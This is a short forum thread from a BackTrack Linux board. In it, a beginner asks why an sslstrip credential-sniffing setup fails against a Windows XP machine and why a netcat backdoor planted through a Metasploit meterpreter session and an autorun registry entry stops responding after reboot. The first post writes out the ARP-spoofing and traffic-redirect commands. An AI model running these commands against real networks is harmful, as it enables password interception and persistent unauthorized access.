Results 1 to 3 of 3

Thread: sslstrip & Netcat backdooring

  1. #1
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    9

    Default sslstrip & Netcat backdooring

    Hey guys!

    I'm new to Backtrack and so I'm facing some problems:

    (I apply everything at home in my own network!)

    SSLSTRIP:
    I use the following commands:
    1. echo 1 > /proc/sys/net/ipv4/ip_forward
    2. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
    3. cd /pentest/web/sslstrip/
    4. python sslstrip.py -p -l 10000 -w /root/Desktop/capture.txt
    5. arpspoof -i eth0 -t <target ip> <gateway ip>


    Backtrack is running on my mac with VMware!

    If I sniff the https sites of the mac, everything works nicely and I get the usernames and the passwords in plain text. But if I sniff my real Win XP(SP3) PC, sslstrip captures nonsence in the /root/Desktop/capture.txt file - I think it captures ssl secured data!
    That's strange because if I enter Facebook (on the Win XP machine) in the URL stands HTTP and not HTTPS, so it should work. On the other side, if I visit Gmail, or something else, the HTTPS is still there (I'm using sslstrip 0.9 - the Gmail-bug should be gone).

    Metasploit - backdooring:

    I got into the Win XP machine with a hidden exploit in an .exe file with windows/meterpreter/reverse_tcp as PAYLOAD. All works perfect - creating a session, uploading netcat(nc.exe), creating a new value in the autorun registry for backdoor(nc) - until I reboot the remote pc. I can't connect with the command "nc <victim ip> <port>" any more.


    I hope you know what to do.
    Last edited by Stallh0f3n; 12-17-2011 at 01:33 PM.

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: sslstrip & Netcat backdooring

    hi
    for netcat tries to take a look in the video section of the forum (3 page at the bottom)
    I did a test with BT5, and "we had opened a tread"
    http://www.backtrack-linux.org/forum...ad.php?t=41488
    bye

  3. #3
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    9

    Default AW: Re: sslstrip & Netcat backdooring

    Quote Originally Posted by zimmaro View Post
    hi
    for netcat tries to take a look in the video section of the forum (3 page at the bottom)
    I did a test with BT5, and "we had opened a tread"
    http://www.backtrack-linux.org/forum...ad.php?t=41488
    bye
    "Page not found"

Similar Threads

  1. Parsing SSLStrip with definitions.sslstrip in easy-cred
    By ericmilam in forum BackTrack 5 Beginners Section
    Replies: 0
    Last Post: 05-31-2011, 08:39 PM
  2. Metasploit - Backdooring EXE Files
    By sevic33 in forum Beginners Forum
    Replies: 1
    Last Post: 08-27-2010, 06:44 PM
  3. Backdooring with Metasploit
    By aspekt9 in forum OLD Pentesting
    Replies: 16
    Last Post: 05-05-2009, 04:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •